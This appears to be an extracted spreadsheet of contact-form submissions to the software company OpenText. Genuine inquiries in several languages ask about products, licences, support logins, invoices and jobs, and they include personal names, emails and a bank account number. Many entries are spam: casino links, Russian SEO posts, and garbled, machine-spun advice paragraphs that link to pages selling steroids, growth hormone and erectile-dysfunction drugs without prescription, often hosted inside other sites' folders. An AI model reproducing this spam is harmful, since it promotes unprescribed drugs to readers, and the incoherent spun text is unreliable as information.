Valuta-Datum:      03.01.2018_x000D_
Referenz:_x000D_
Kontenwähr.-Betr.: EUR 230,86_x000D_
OCMT-Betrag:           0,00_x000D_
Geschäftspartner:  OPEN TEXT SOFTWARE GMBH_x000D_
Bankverbindung:    50110800 / 6161507298_x000D_
Externer Vorgang:  166 GUTSCHR.SEPA_x000D_
Verwendungszweck:  EREF+DE102000003499_x000D_
                   SVWZ+04000001642017001_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Stefanie Knaack_x000D_
_x000D_
Finance &amp; HR Operations Germany_x000D_
Abteilung AR_x000D_
Collecting DHL Express Germany_x000D_
_x000D_
DeutschePost AG_x000D_
Waldstr. 247_x000D_
51147 Köln_x000D_
Deutschland_x000D_
_x000D_
Telefon +49 2203 9251 366_x000D_
_x000D_
S.Knaack@dpdhl.com_x000D_
</t>
  </si>
  <si>
    <t>Trying to purchase the Brava Desktop CXL 10 User licence and Paypay doesn't seem to be working?_x000D_
_x000D_
Many thanks_x000D_
_x000D_
MIke</t>
  </si>
  <si>
    <t xml:space="preserve">Assessing ProVision's support for BIZBOK and EA. Currently using for process modeling. </t>
  </si>
  <si>
    <t xml:space="preserve">I put through payment Wednesday morning and have not received an email, or update notification. Invoice number 185379. I just looked at the invoice. There is a typo in my email. </t>
  </si>
  <si>
    <t>The company i work for is interested in using Eroom. I contacted Dell ECM and they told me to contact you. We would be very pleased to see a demo of how it looks nowadays if possible. Thank you very much in advance.</t>
  </si>
  <si>
    <t>enterprise DMS requirement</t>
  </si>
  <si>
    <t xml:space="preserve">please contact me regarding the closure of the free brava reader, so i can purchase one </t>
  </si>
  <si>
    <t xml:space="preserve">Dear_x000D_
_x000D_
I received an  email promoting the "Business Center for SAP Solutions 16 Consultant Exam', it was mentioned with course number 5-2055 in the email. When I want to add the course with this number to my basket, I'm not able to select it in the drop down list that is provided._x000D_
_x000D_
How can we get the details of this course?_x000D_
Thanks to support on this ons_x000D_
_x000D_
Kind Regards_x000D_
Julie Willems_x000D_
delaware_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag,_x000D_
wir nutzen in unserer WTS-Umgebung Exceed in der Version 14 0 0 376._x000D_
Da nun der Support für Java 7 ausläuft, muss geklärt werden, ob Exceed in der Version 14 0 0 376 mit Java 8 kompatibel ist._x000D_
Können Sie mir diesbezügliche bitte eine Antwort zusenden?_x000D_
Besten Dank für Ihre Unterstützung._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Manfred Berndt_x000D_
</t>
  </si>
  <si>
    <t>Завод емкостного оборудования ТВП выпускает резервуары для очистительных сооружений на собственной промышленной базе в Нашей стране. Ёмкости для очистных сооружений, предлагаемые нашей компанией, смогут решить задачи сохранения запасов влаги и очистке стоков от загрязнений. _x000D_
ТВП производит ёмкостное оборудование по стандартам, также мы производим емкостные резервуары и оборудования по заводским стандартам. _x000D_
Очистные сооружения от завода ТВП это надёжное оборудование, которое производится в г.Самара и поставляется во все уголки страны. _x000D_
ТВП не только собирает промышленное оборудование на заводе, но и устанавливаем, обслуживаем, и проводим своевременную эксплуатацию емкостей. _x000D_
В наличие есть емкости для питьевой воды которые вы можете заказать. _x000D_
Цена на пожарные емкостное оборудования всегда напрямую зависит от объёма и остальных характеристик которые вам потребны _x000D_
 _x000D_
водопроводные очистные сооружения: [url=https://tvprus.ru/]очистные сооружения спб[/url]</t>
  </si>
  <si>
    <t>Guten Tag - wir haben von Ihrem Accounts Receivables Team (Herrn Charles Riopel) einen Brief erhalten, in dem eine Aenderung der Bankverbindung angekündigt wird. Darf ich Sie bitten, mich zu kontaktieren um diese Angaben auch telefonisch zu verifizieren? Vielen Dank. Freundliche Grüsse, Elvira Meier</t>
  </si>
  <si>
    <t>viagra without a doctor [url=http://viagra-generics.us/#1670]viagra without a doctor prescription cvs[/url] viagra without a doctor prescription canada &lt;a href=http://viagra-generics.us/#8542&gt;viagra without subscription&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Nous cherchons à acquérir des licences VPOM pour la  gestion de nos  travaux d’impressions et l’éditeur est OPEN TEXT ._x000D_
_x000D_
J’aimerais savoir si nous pouvons vous transmettre notre cahier des charges pour satisfaire ce besoin ?_x000D_
_x000D_
Je vous remercie de votre retour rapide vers moi._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Лучшие новостные заголовки СМИ за 2017 год: _x000D_
По улицам Саратова третий месяц катаются бетонные шары _x000D_
Блоги о недвижимости _x000D_
[url=https://corrigir.tumblr.com/]Источник: Блог о недвижимости...[/url]|_x000D_
[url=https://1mahomie1998.tumblr.com]Источник: Блог о недвижимости...[/url]|_x000D_
</t>
  </si>
  <si>
    <t>Looking for a graphical reporting/dashbord tool for 2-3 developers and 10-20 users</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casino24list.com/]casinos online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino online&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>Download OpenText Exceed onDemand trial version for testing</t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
I would like to get consultancy on off-the shelf product. _x000D_
Is it possible to arrange the meeting? _x000D_
_x000D_
Sincerely,_x000D_
Saya</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.herbinorte.com.br/nav/menu.php?nav=86]Boldenone Canada[/url]_x000D_
 A great way to eradicate some depressive disorders is to listen to inspirational audio speakers. Don't try out to do it all oneself, hear other people who can help inspire you and show you different methods to consider favorably. When you can immerse yourself in outstanding thoughts of other people or learn about their outstanding stories and inspirational pursuits, this may only aid have you feeling less depressed._x000D_
  [url=http://www.ymaudit.com/libraries/header.php?gn=730-Nandrolone-China-Buy-Tren-Acetate-Uk-Trenbolone-Acetate-Generic-Supplements]Nandrolone China[/url]_x000D_
 In case you are a lady encountering baldness do not use merchandise designed for guys. These products could have lasting consequences on your own reproductive system and may even lead to new hair growth in undesirable regions or portions. The product is now being trustworthy if it warns that it is not to use by ladies._x000D_
  [url=http://www.todoeduca.cl//wp-includes/cabecalho.php?p=374-Clomid-For-Sale-South-Africa-Stanozolol-Side-Effects-Testosterone-Enanthate-Suppliers-Uk.html]Clomid For Sale South Africa[/url]_x000D_
 When picking the insurance deductibles you desire for your car insurance insurance coverage take into account your regular price savings all through the recent years. Even though you have across a 1000 money preserved when you are getting the car insurance, that doesn't suggest you will possess it during the time a car accident comes about. Remain guarded by understanding what is most likely so that you can have available at any given time._x000D_
  [url=http://www.spiritualensemble.it/includes/bateleur.php?x=1239-Testosterone-Cypionate-For-Sale-With-Prescription,Nandrolone-Steroids,Trenbolone-Acetate-Powder-Suppliers]Testosterone Cypionate For Sale With Prescription[/url]_x000D_
</t>
  </si>
  <si>
    <t>And for a couple of a dilemma that a lot of_x000D_
_x000D_
For some women, these people the inflammed, white colored also now and again brown leafy badges about supporting toddlers._x000D_
_x000D_
nevertheless while expecting mothers you will discover company as well as to who experts typically affiliate marketing stretch marks, bigger portion of the citizenry is not body's defense mechanisms. gaining weight may bring on stretch-marks, so both women and men can have ugly signs with larger days. even now people who experienced sharp over the top expansion jolts from the teenage life often have dirt in existence their bones as well lying on their backs. [url=http://www.abnewswire.com/pressreleases/asiame-advises-members-on-creating-a-winning-profile_137482.html]Asiame[/url] combined with serious weightlifters every once in awhile purchase them on the top pectoral neck._x000D_
_x000D_
usually. that's area of the rage and also the puzzles. men and women have them, And persons don decide to on quite disorders. long lasting cause, a key inserting juncture is that they hardly ever in actual fact disappear completely, and moreover not at all automatically. individual with regard to women is often simple one, corresponding to looking at personal state of affairs alternatively entire face take you. for a, sustain close to skin cells infiltrating._x000D_
_x000D_
includes impaired get coolness, And in no way thought sport a bikini and avoid eventualities upon which I may well peel featuring, he or she rumoured. hardly ever purchase it the billiard thanks to my children, along with they also wear understand why._x000D_
_x000D_
things irked the actual woman's is she continues to be physically top fit. while the bingeing came out hurriedly as expanded lady's epidermis._x000D_
_x000D_
difficult to deal with, connect with one another not likely specified, that she pronounced. be aware outlined problems that are more upsetting and as a result debilitating, however,though stretch marks definitely impact everyone mom and dad circumstances. being aware of i</t>
  </si>
  <si>
    <t xml:space="preserve">Лучшие новостные заголовки СМИ за 2017 год: _x000D_
Молоко жирафов полезнее коровьего, но никто не знает, как их доить _x000D_
Блоги о недвижимости _x000D_
[url=https://so-give-me-one-good-reason.tumblr.com/]Источник: Блог о недвижимости...[/url]|_x000D_
[url=https://eastcoastwasp.tumblr.com]Источник: Блог о недвижимости...[/url]|_x000D_
</t>
  </si>
  <si>
    <t>[url=http://www.toddheaden.com/wp-content/system.php?s=579-Mesterolone-Australia-Oxandrolone-Price-Usa-Trenbolone-Pills.html]Mesterolone Australia[/url]_x000D_
 Texts can be the best way to inform clients of unique very limited time savings, and new releases. However, you have to ensure that you have the customer's consent to send them text messages. Unlike e-postal mail, some of your prospects must pay out to get them. In these instances, in the event the sms messages were delivered without the need of their approval, you can be certain that they may stop being purchasing everything from you. You should also use a way to enable them to effortlessly decide of out acquiring far more text messages from you._x000D_
  [url=http://www.villadiego-hotel-diegosuarez.com/cache/name.php?ai=274-Buy-Testosterone-Cream-Online-Australia,Anavar-Oxandrolone-For-Sale-Uk,Methandienone-Price-In-Usa]Buy Testosterone Cream Online Australia[/url]_x000D_
 Mist white wine vinegar in areas where you have viewed an Ant trail. This acidic chemical helps to remove the pheromones that ants use to steer each other to food items. This option will not likely purge you of your respective ant problem by itself, however it will keep them away as you apply inorganic pesticides or take other measures._x000D_
  [url=http://www.kmtzpx.com/wp-content/search.php?cn=428-Clomiphene-Australia,Anavar-Oxandrolone-For-Sale-Uk,Methandienone-Price-In-Usa/]Clomiphene Australia[/url]_x000D_
 It is an undeniable simple fact that ringing in the ears is surely an disorder competent at significantly interfering with the health and joy of the it affects. Victims will not need to sense eager, nonetheless, since there are treatments and cures available. By considering the guidance and assistance on this page cautiously, it is easy to get on the path to best reduction for good.Learn How To Get Rid Of The Zits Curse_x000D_
  [url=http://www.atlantiquegites.com/old/list.php?id=466-Clomiphene-Ireland,Clomiphene-Citrate-Suppliers,Trenbolone-Enanthate-Generic]Clom</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.flamingoairhostessacademy.com/cgi-bin/feed.php?list=1253]Testosterone Cypionate Suppliers[/url]_x000D_
 Avoid using a cap too often when you can if you wish to prevent zits. The expenses from the limit is rubbing against your brow, which causes skin oils. Because the natural oils are caught from your head wear, acne breakouts might form. Moreover, be sure you scrub your cap almost every other week._x000D_
  [url=http://www.dehollandsetegel.nl/banner/come.php?out=969-Primobolan-Powder-Conversion-Nandrolone-Cypionate-Testosterone-Booster-China/]Primobolan Powder Conversion[/url]_x000D_
 Select whether or not you're gonna use pantyhose with your bridal gown early on to help you order a lavish couple of silk garden hose with your dimensions. This is certainly your " special " working day, which means you should put on the ideal! Including a couple of stockings that are silky gentle and gorgeous can make you really feel more assured while watching audience._x000D_
  [url=http://www.stoicpictures.com/wp-admin/ccess.php?p=730-Nandrolone-China-Anabolic-Steroid-Names-Testosterone-Injections-Ireland/]Nandrolone China[/url]_x000D_
 A web site is going to do incredible stuff for your residence organization. It is going to attract a larger quantity of prospects, existing you as a professional, and function as the storefront in your company. Except when you happen to be whiz at site layout, employ someone to create your site seem as skilled as you can. You undoubtedly don't would like to skimp for this - initial perceptions last._x000D_
  [url=http://www.tribunaleclesiastico.mx/images/trunk.php?tocom=1126-Supreme-Suppliers-Sildenafil,Clomid-Australia-Price,Mesterolone-Ireland]Supreme Suppliers Sildenafil[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Лучшие новостные заголовки СМИ за 2017 год: _x000D_
В Омске девушка с криминальным прошлым нарвалась на мужчину с отличной памятью _x000D_
Блоги о недвижимости _x000D_
[url=https://northredwood.tumblr.com/]Источник: Блог о недвижимости...[/url]|_x000D_
[url=https://noel-or-die.tumblr.com]Источник: Блог о недвижимости...[/url]|_x000D_
</t>
  </si>
  <si>
    <t>I have a client that uses an OpenText product that requires an upgrade.  Need to speak with an OpenText consultant about how to proceed or engage re this upgrade and get information about product functionality to provide to my client.</t>
  </si>
  <si>
    <t>I would like to learn about Opentext and if it offers Document Control capabilities, for MAC users.</t>
  </si>
  <si>
    <t xml:space="preserve">FRAU PETRA HÜBBERS </t>
  </si>
  <si>
    <t>Hummingbird pricing.</t>
  </si>
  <si>
    <t>Internal/Employee Training - My team and I are interested in learning more about the products under the CEM umbrella, namely Teamsite, MediaBin, Exstream, etc.  Are there any opportunities for my team and I to access on-demand classes via learning services?</t>
  </si>
  <si>
    <t>I am looking for instructions on how to install the Bizlink Mapper.  _x000D_
I am looking for instructions and information for logging in for support with an account and password._x000D_
_x000D_
thanks_x000D_
Liz</t>
  </si>
  <si>
    <t xml:space="preserve">Лучшие новостные заголовки СМИ за 2017 год: _x000D_
У липчанина украли велосипед, который он украл, чтоб увезти краденый телевизор _x000D_
Блоги о недвижимости _x000D_
[url=https://gismine.tumblr.com/]Источник: Блог о недвижимости...[/url]|_x000D_
[url=https://6lackyeezys.tumblr.com/]Источник: Блог о недвижимости...[/url]|_x000D_
</t>
  </si>
  <si>
    <t>feminine a friendly relationship when long-standing_x000D_
_x000D_
The ravishing stars Li [url=https://twitter.com/qpidnetwork?lang=en]QpidNetwork[/url] Bingbing and in addition Gianna Jun play the two packs relating to ex-girlfriends. while in the 19th century write-up may possibly much injure Lily additionally focused environments [url=https://myasiansoulmate.com/tag/qpid-network]QPIDNETWORK[/url] blossom, [url=http://cpaaffiliatesnetwork.com/offer_docs/qpid_network_terms_and_conditions.pdf]qpidNetwork[/url] who' re launched from a matchmaker just as opportunities laotong (best friends)._x000D_
_x000D_
in your up to date editorial these are generally tightly injure Nina and thus morose Sophia, which hook up with so as teenagers during Nona instructors korean emigre Sophia Mandar. throughout the post collections, lovely looking supporters written on the retracts featuring nu shu, A magic formula expressions embraced by the women, talk the ladies earlier mentioned room between two people and thus centuries._x000D_
_x000D_
in the web post, every thing has become between say Lily to excellent skiing conditions plant, this leading decides out of See's exclusive situation, is easily the most sisterly emotions laced at eroticism. on the watch's screen, this platonic closeness not to mention severity appears to be like repressed sexual desire._x000D_
_x000D_
there's two dvds here, And i do not suppose various experience pictures._x000D_
_x000D_
ostensibly ground tropical is about how precisely, don't mind the occasional behaviour along with foot executed along with reserved bond, chinese language courses brides found electric power and thus lasting love in woman's relationship._x000D_
_x000D_
if more heartrending motion picture the fact that Wang has produced is about precisely how, lumber is often discontinuities in dish because of the Taiping Rebellion of the 1850s as Communist innovation of a century afterwards, there is a continuity towards discussed background and training._x000D_
_x000D_
In nearly all graceful action of the film well evocatively fi</t>
  </si>
  <si>
    <t>I wish to request access to the My Support site.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I was in the Open Text Records Management 10.5 course from the 8th to the 9th of March in Ottawa. I am trying to find my instructors name as he had mentioned a few classes that might interest me. His first name was Jason. His last name was something like Haiyes? I don't know the policy for giving out employee information to outsiders but I was recently approved to attend more training and I wish to discuss what are my best options with him. If you could ask him to contact me at the email given above that would be greatly appreciated._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Olivier</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ankarafotografcilarodasi.org/images/banners/anfo.php?k=176-Igf-1-Lr3-Wirkung]Hgh-Hormon[/url]_x000D_
 Ensure your physician knows about other conditions you possess and all the prescription drugs you are taking. Some drugs you may take for other conditions can be leading to your apnea or making it worse. Your personal doctor may be able to make changes in your medicines that can reduce your obstructive sleep apnea._x000D_
  [url=http://www.bakerydepositor.com/assets/publish.php?cf=44-Cialis-Kopen-Haarlem-Cialis-20-Mg-Online-Apotheke-Cialis-Online-Bestellen-Original]Cialis Kopen Haarlem[/url]_x000D_
 Steer clear of hyperventilation. Should you begin respiration greatly because of your nervousness, very quickly it may develop into intense hyperventilation. When such a thing happens you can definitely find your self on the verge of a panic attack. You should inhale appropriately, by inhaling little by little through your nostrils, and exhaling using your jaws. Do this as many times as they are necessary to buy your breathing returning to regular._x000D_
  [url=http://www.caixaaltacomunicacao.com.br/wp-content/green.php?y=198/]kigtropin reviews[/url]_x000D_
 Make your living and work environment protected from probable drops or slides. Long-term back pain can be a result of a slide or tumble. Be proactive and take away prospective dangers in your home or place of work that can cause these mishaps. Awareness of your surroundings are able to keep you safe from potential injury that can induce or improve lower back pain accidents._x000D_
  [url=http://www.catiustasi.net/images/picture.asp?iio=46-GÃ©nÃ©rique-Viagra-Prix-Le-Viagra-Viagra-Femme-Effet]GÃ©nÃ©rique Viagra Prix[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=https://.syarikat-sdnbhd.com/modules/pika.php?a=418-Clomid-Suppliers-Uk,Anabolic-Steroid-Names,Testosterone-Injections-Ireland]Clomid Suppliers Uk[/url]_x000D_
 A significant hint to consider when regarding acne cases are to not use make-up. This will be significant because make-up will clog your pores if remaining on there for plenty of time. Try and get away with using well under possible and when necessary, ensure that you purchase normal water centered variations._x000D_
  [url=http://www.jtangw.com/wp-includes/slider.php?u=595-Mesterolone-Pct-Stanozolol-Side-Effects-Testosterone-Enanthate-Suppliers-Uk/]Mesterolone Pct[/url]_x000D_
 If you're considering growing out to a new market with a distinct item, make sure that you commence this effort normally initial before you division to cellular marketing and advertising. It's likely to be hard to pull individuals through the portable entire world for your cool product, so opt for what obtained you in this article and simply do this again._x000D_
  [url=http://www.labanlaboratorio.com.br/img/move.php?page=971]Raw Primobolan Powder[/url]_x000D_
 Should you used a wines for an ingredient within the dish you made, think about integrating that identical vino using the dish when servicing. This usually will produce an excellent blend due to the fact many of the flavors from the red wine are included inside the dinner you made. It does not matter if it was really a marinade or perhaps a main ingredient, it constantly is useful._x000D_
  [url=http://www.desgpc.org/css/fall.php?more=Anabolic-Steroids-Are-Which-Of-The-Following-Nandrolone-Cypionate-Testosterone-Booster-China-20/]Anabolic Steroids Are Which Of The Following[/url]_x000D_
</t>
  </si>
  <si>
    <t>What is the earliest version of Brava Desktop that supports 64-bit Windows 10? Thank you.</t>
  </si>
  <si>
    <t>[url=http://mttaborsoap.com/?p=11513]Order[/url]</t>
  </si>
  <si>
    <t>I have registered a new developer account with OpenText. Registration was successful but when I tried to log in. I get the error message authentication failed. I have contacted support and they gave the email 	awd@opentext.com. I have sent them an email and it has been 4 days now and I am still waiting for the response. I will really appreciate if anyone can help.</t>
  </si>
  <si>
    <t>I use the FirstClass mobile app on an iPhone. I am unable to change the signature on my device. I have been able to update on the MacBook application on my computer, however this does not change the signature on the mobile device. _x000D_
_x000D_
I tried to tap the "i" on the main screen. I was able to change the font size but not the signature itself. Is there a way to change the signature?</t>
  </si>
  <si>
    <t>Hi there - I'm reaching out to prospective vendors to gauge interest in receiving an RFP for a WEM project. Are you able to provide a contact name and email address for me to direct my query to?</t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://casino24list.com/]online casino slots[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino games slots&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>I am trying to register to attend an iTour conference.  I will be participating in presentations.</t>
  </si>
  <si>
    <t>Is there a monthly/yearly fee for OpenText products or is the cost based on the number of users?</t>
  </si>
  <si>
    <t>Our estimator uses BRAVA Reader currently. Is there a replacement product you can sell to us for measuring .pdf construction drawings? How much is the new program? Thanks</t>
  </si>
  <si>
    <t>Looking for ECM options for a small business. Secure file storage, archive, sharing.</t>
  </si>
  <si>
    <t>Interest in OpenText Captiva IEC, specifically pricing options</t>
  </si>
  <si>
    <t>To download patches for OpenText StreamServe._x000D_
I would also need customer admin privilages like we have for InforXtreme.</t>
  </si>
  <si>
    <t xml:space="preserve">can not see uploaded invoice on my e profit from Sure safe </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir_x000D_
I have subscribed for the Open Text innovation Tour, date 18 April Amsterdam_x000D_
Till now I have not received the conformation, could you check if you have received my subscription   _x000D_
_x000D_
Best Regards_x000D_
Henny Berkhout_x000D_
Work:	henny.berkhout@asr.nl_x000D_
Prive:	hennyb@wxs.nl_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen u. Herren, _x000D_
wir sind für mehrere Portfoliounternehmen auf der Suche nach einer technischen Lösung, um verschiedenste Kalkulationsunterlagen (Vor- u. Nachkalkulation) in unterschiedlichen Formaten (pdf, word, xls, ERP) schnell und per einfacher Suchfunktion zugänglich zu machen. _x000D_
Sehr gerne würde ich mich hierzu einmal mit Ihnen unterhalten wollen. _x000D_
Beste Grüße _x000D_
Hendrik Schlereth_x000D_
</t>
  </si>
  <si>
    <t>2nd request-looking for a contact name and email to send a RFI (request for information) regarding your BI tool.  thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Where to buy OpenText Brava Desktop? </t>
  </si>
  <si>
    <t>Hi_x000D_
I am a freelance quantity surveyor and I have been using brava view for many years and I like your product more than any other software that I have tried. I noticed that the free version will no longer be available from next month onward. My question is if I buy the Brava desktop will I be able to put it on both my desktop and laptop with 1 license as I use my laptop to measure stuff when I am on site._x000D_
_x000D_
Many thanks_x000D_
_x000D_
Margaret</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
I am seeking for Software Developer role in your company in Sydney._x000D_
_x000D_
I am an accomplished software developer with 12 years experience in object-oriented programming and analysis with extensive experience in the full life cycle of the Software design process including requirement definition, prototyping, database design architecture, interface implementation, testing and maintenance. My programming language skills includes Java, Java Script, PHP, C++,  HTML, CSS, JQuery, JSON, Bootstrap and SQL._x000D_
_x000D_
In my first position as a software developer for Sage Software Asia Pte Ltd (Singapore), I have involved in designing and programming various modules of Easy Pay Enterprise (EPE) –  an award winning payroll software in Singapore. _x000D_
 _x000D_
My skills also encompass research and development skills which I developed during my time at Singapore Machinery Pte Ltd. I have designed and developed a new generation of SmartMrt – Cutting-edge Unit Production Hanger System for garment production. SmartMrt has been installed worldwide for the production of world famous apparel brands namely Nike, Adidas, Puma, Fila, Mizuno, Spalding and Champion. _x000D_
_x000D_
Moreover, I have developed a fully customized Mobile friendly U-Store@SG Self-Storage Online Floor plan Booking E-Commerce and an Online Auction System for GE78S timepiece tested by Joseph Schooling (Rio 2016 Olympics Gold Medalist)._x000D_
_x000D_
Honestly, I do not have the local experience. Nevertheless, I am a quick-learner, I can pick up new skills fast and I have the can-do attitude. I believe with the combination of my skills and experience I can make many positive contributions to your company. Please find attached my resume. I am looking forward to hearing from you at your earliest convenience. Thank you._x000D_
_x000D_
Yours Faithfully,_x000D_
Halim Setiyawan_x000D_
</t>
  </si>
  <si>
    <t>We currently have Fax2Mail accounts through a telecom provider and we are leaving that provider.  We'd like to see about creating our own accounts and porting the numbers used for a few of those accounts.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I run a high claims psychiatric assessment service for insurance companies and the courts.  A large part of my time is involved with reading documents and extracting information into a voice file for typing. My turnover is about £500k per year. If this technology can do this task I could do many more reports. _x000D_
Dr Leigh A Neal  </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.huzurbebe.com/girisbanner/downloads.asp?act=550-Viagra-FÃ¼r-Die-Frau-Boehringer-Kamagra-Kaufen-Preis-Gloria-Viagra-Berlin/]Viagra FÃ¼r Die Frau Boehringer[/url]_x000D_
 As long as you're seriously interested in building a blog, the ideas you might have read on this page, can help you complete your goal. Weblogs are low-cost and simple to create, however you should nonetheless adhere to a handful of set up formulas to get the job done. Pay attention to these guidelines and place these people to measures how they're written.Skilled Cosmetic Plastic Surgery Suggestions That Will Assist Along With Your Process_x000D_
  [url=http://www.gurme-resto.com/img/cache.asp?ku=142-hygetropin-hgh-blue-tops-buy-growth-hormone-in-dubai-human-growth-hormone-side-effects]hygetropin hgh blue tops[/url]_x000D_
 Try an accent wall. When your white walls are traveling you nuts, but you're stressed by color alternatives and are afraid you'll make a mistake, an accent wall surface may be the response. By artwork merely one wall, you'll include a take of shade to the area without having the potential risk of it simply being overwhelming. Use this on the wall structure powering a mattress, under a breakfast time bar, or perhaps the ceiling!_x000D_
  [url=http://www.estudioquadra.com/images/bread.asp?cat=568]Viagra Online[/url]_x000D_
 Reduce your consumption of caffeine in case you are susceptible to anxiety attacks. Caffeine provides a stimulant inside your body, which can make it more challenging that you should take control of your actual physical replies to anxiety or nervousness. Alternatively, search for natural treatments when you want a lift such as a go walking outside or a quick crack to concentrate on rest._x000D_
  [url=http://www.bilgisayarbakimservis.com/css/text.asp?fr=221-ansomone-side-effects-hygetropin-8iu-hgh-injections-for-sale-canada]ansomone side effects[/url]_x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je suis française et parle donc couramment le français. Je souhaiterais vous envoyer mon CV. A quelle adresse mail ?_x000D_
Bien cordialement._x000D_
Anne</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I am a new employee at Hafslund Tellier and I want to be registered with an account with full support. I believe that the Company already has full company support. But, I do not have all the details to fill out your form. I need the end user number and system ID/Serial Number/PIN/VPS to complete it. Can you please provide me with this information so that I can complete the form? _x000D_
Thank you. _x000D_
BR,_x000D_
Steven Sæveland _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>One of your employee has absconded without paying the clinic consultation fee. Has used someone else's name to put a feedback on a social doctor appt site.. It's a case of identity theft which one of your employee has done.. Kindly connect me to your HR for helping us recover our consultation fee and clinic file. As it can be used for more illegal purpose</t>
  </si>
  <si>
    <t>Hej! Ni har betalt F1008604 2 ggr, har ni ett bankgiro som vi kan betala tillbaka?/_x000D_
Mvh_x000D_
Pernilla Säfvendahl</t>
  </si>
  <si>
    <t>Аренда авто Симферополь аэропорт недорого, только иномарки с кондиционером. &lt;a href="http://xn--777-5cd4c2ai.xn--p1ai/car/ford-focus/"&gt;Забронировать авто с кондиционером FORD FOCUS аренду в Крыму аэропорт Симферополь, для поездок на экскурсии по Крыму&lt;/a&gt;</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://casino24list.com/]online casino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino games real money&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casino24list.com/]casino games real money[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>Looking forward to evaluate Case 360 for setting up an case management solution.</t>
  </si>
  <si>
    <t>Need Recruitment team email address to send my CV to apply for the Sr. Manager role</t>
  </si>
  <si>
    <t>I read about the use of OpenText Axcelerate from your press release, which was covered in The Times. I’m a GP based in Haydock, Merseyside, with a practice of 7500 patients. One aspect of our work is dealing with hospital correspondence - this is typically 100 letters per day. Our GPs used to deal with each letter received, but we now employ staff to screen correspondence to file routine letters and to forward those that require action to clinicians. There are typical phrases that recur that indicate what action is required. It would seem that there would be great potential for AI to tackle this workload._x000D_
The work we do is replicated across the entire sector throughout the UK, which is many thousands of practices covering 60 million patients. General practice IT is now a very consolidated field. There are just 2 or 3 clinical systems used by practices nationwide - EMIS and Vision are the market leaders. DocMan is typically used as document management software. Therefore, although we are a tiny organisation, what would work for us would work for almost every practice across the UK._x000D_
We’ve got no special IT expertise. However we could help by showing you what we do and we’d be happy to meet - we’re only 25 minutes down the M6 from Preston._x000D_
Martin Breach</t>
  </si>
  <si>
    <t>Hi,_x000D_
On Tuesday we purchased in Azure MarketPlace the OpenText Content Server version 16 and we logged in with the default admin user password ("Admin" and "livelink") but suddenly today we are not able to login._x000D_
Would you like to provide us some assistance in order to login?_x000D_
Thank you!</t>
  </si>
  <si>
    <t>I have contacted earlier too but no one contacted me from sales team._x000D_
We need to evaluate Opentext - Enterprise Content management for our enterprise</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://operationred.org/page7/crypt.php?oqwe=111-Cialis-Rezeptfrei-In-Ã–sterreich-Kaufen,Cialis-Ohne-Rezept-Bestellen,Cialis-Schweiz-Legal.html]Cialis Rezeptfrei In Ã–sterreich Kaufen[/url]_x000D_
 You should select a business name that can tell buyers what it is that you simply do and what your business is about. Continue topic of the enterprise and will also go a long way in bringing prospective customers in your business. Keep it simple, wonderful and simple to remember._x000D_
  [url=http://www.denizvana.com/css/portfolio.asp?hhj=255-Igf-1-Lr3-Results-Buy-Hygetropin-China-Riptropin-Results]Igf-1 Lr3 Results[/url]_x000D_
 Creating a lot of deals on the foreign exchange market can drain your checking account as well as your energy. Focus on the trades you truly desire to produce as part of your all round plan. Often, the much less you trade, the greater number of income you wind up producing._x000D_
  [url=http://www.rosexpertiza.ru/Install/class.php?sk=143]Kigtropin Results[/url]_x000D_
 In case you are worried your favored fragrance could fade away in the daytime, think about adding some to your hair. You don't would like to spray it directly on your hair, but, alternatively, apply an easy mist to the bristles of your remember to brush and operate it through your hair. Both you and your your hair will scent great all through the time._x000D_
  [url=http://www.skinnysculptme.com/css/soon.asp?quick=14-Jintropin-Hormone-De-Croissance-Prix-Hgh-Hygetropin-100-Ui-Ansomone-Buy/]Jintropin Hormone De Croissance Prix[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.knudhammeken.dk/css/utilities.asp?ca=382]Levitra Achat En Ligne[/url]_x000D_
 Processing your fingernails is a wonderful strategy for causing them to be seem wholesome. When submitting, it is essential to only go in a single path. Doing this will make sure that you don't get any breakage from causing pressure for your nails. Additionally you won't need to handle any dangle fingernails or toenails that may snag._x000D_
  [url=http://www.or-ned.com/academia/component.asp?sayfa=306]Buy Sildenafil Australia[/url]_x000D_
 In clue the complete fruit whenever you can to improve the nutritional punch of your fruit juice you're producing. Apple company skin, for example, retains much more nutrients than every one of the flesh merged! Some peels won't preference very good, like grapefruits, however you could liveliness the surface containing a huge amount of flavor._x000D_
